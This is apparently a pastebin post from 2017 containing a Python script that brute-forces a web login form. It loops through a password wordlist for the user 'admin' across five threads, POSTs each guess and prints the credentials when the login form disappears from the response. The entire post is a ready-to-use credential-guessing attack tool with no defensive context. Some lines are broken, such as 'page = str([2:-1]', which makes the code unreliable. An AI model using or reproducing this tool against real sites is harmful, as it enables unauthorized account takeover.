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brute force form

a guest
Dec 9th, 2017
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  2. from html.parser import HTMLParser
  3. import urllib.request
  4. import urllib.parse
  5. import http.cookiejar
  6. import queue
  7. import threading
  8. import sys
  9. import os
  11. threads = 5
  12. resume_word = None
  13. username = "admin"
  14. headers = {}
  15. target_url = ""
  16. post_url = ""
  17. username_field = "username"
  18. password_field = "password"
  20. #Takes a word file and builds a word queue object. You can resume a word in the file
  21. #by modifying the resume_word value in the script
  22. def build_passwd_q(passwd_file):
  23. fd = open(passwd_file, "rb")
  24. passwd_list = fd.readlines()
  25. fd.close()
  27. passwd_q = queue.Queue()
  29. if len(passwd_list):
  30. if not resume_word:
  31. for passwd in passwd_list:
  32. passwd = passwd.decode("utf-8").rstrip()
  33. passwd_q.put(passwd)
  34. else:
  35. resume_found = False
  36. for passwd in passwd_list:
  37. passwd = passwd.decode("utf-8").rstrip()
  38. if passwd == resume_word:
  39. resume_found = True
  40. passwd_q.put(passwd)
  41. else:
  42. if resume_found:
  43. passwd_q.put(passwd)
  44. return passwd_q
  46. #An instance of this class, would perform the following:
  47. #1- Pull out a password from the queue
  48. #2- Retrieve the login HTML page
  49. #3- Parse the resulting HTML looking for username and password fields
  50. #as part of the input form
  51. #4- Performs a POST on the login page with the username and the retrieved password
  52. #5- Retrieve the resulting HTML page. If the page does not have the login form,
  53. #we assume Brute-Force is successful. Otherwise, repeat the whole process with
  54. #the next password in the queue
  55. class BruteForcer():
  56. def __init__(self, username, passwd_q):
  57. self.username = username
  58. self.passwd_q = passwd_q
  59. self.found = False
  61. def html_brute_forcer(self):
  62. while not passwd_q.empty() and not self.found:
  63. #Enable cookies for the session
  64. cookiejar = http.cookiejar.FileCookieJar("cookies")
  65. opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cookiejar))
  67. #This allows urlopen to use cookiejar
  68. urllib.request.install_opener(opener)
  70. request = urllib.request.Request(target_url, headers=headers)
  71. response = urllib.request.urlopen(request)
  73. #The response is in bytes. Convert to string and remove b''
  74. page = str([2:-1]
  76. #Parse HTML Form
  77. parsed_html = BruteParser()
  78. parsed_html.feed(page)
  80. if username_field in parsed_html.parsed_results.keys() and password_field in parsed_html.parsed_results.keys():
  81. parsed_html.parsed_results[username_field] = self.username
  82. parsed_html.parsed_results[password_field] = self.passwd_q.get()
  84. print(f"[*] Attempting {self.username}/{parsed_html.parsed_results[password_field]}")
  86. #Must be bytes
  87. post_data = urllib.parse.urlencode(parsed_html.parsed_results).encode()
  89. brute_force_request = urllib.request.Request(post_url, headers=headers)
  90. brute_force_response = urllib.request.urlopen(brute_force_request, data=post_data)
  92. #The response is in bytes. Convert to string and remove b''
  93. brute_force_page = str([2:-1]
  95. #Parse HTML Form
  96. brute_force_parsed_html = BruteParser()
  97. brute_force_parsed_html.feed(brute_force_page)
  99. if not brute_force_parsed_html.parsed_results:
  100. self.found= True
  101. print("[*] Brute-Force Attempt is Successful!")
  102. print(f"[*] Username: {self.username}")
  103. print(f"[*] Password: {parsed_html.parsed_results[password_field]}")
  104. print("[*] Done")
  105. os._exit(0)
  106. else:
  107. print("[!] HTML Page is Invalid")
  108. break
  110. #Brute-Forcing with multiple threads
  111. def html_brute_forcer_thread_starter(self):
  112. print(f"[*] Brute-Forcing with {threads} threads")
  113. for i in range(threads):
  114. html_brute_forcer_thread = threading.Thread(target=self.html_brute_forcer)
  115. html_brute_forcer_thread.start()
  117. #An instance of this class allows for parsing the HTML page looking for username
  118. #and password fields as part of the input form. self.parsed_results should contain
  119. #username and password keys
  120. class BruteParser(HTMLParser):
  121. def __init__(self):
  122. HTMLParser.__init__(self)
  123. self.parsed_results = {}
  125. def handle_starttag(self, tag, attrs):
  126. if tag == "input":
  127. for name, value in attrs:
  128. if name == "name" and value == username_field:
  129. self.parsed_results[username_field] = username_field
  130. if name == "name" and value == password_field:
  131. self.parsed_results[password_field] = password_field
  134. print("[*] Started HTML Form Brute-Forcer Script")
  135. print("[*] Building Password Queue")
  136. passwd_q = build_passwd_q("passwd.txt")
  137. if passwd_q.qsize():
  138. print("[*] Password Queue Build Successful")
  139. attempt_brute_force = BruteForcer("admin", passwd_q)
  140. attempt_brute_force.html_brute_forcer_thread_starter()
  141. else:
  142. print("[!] Empty Password File!")
  143. sys.exit(0)
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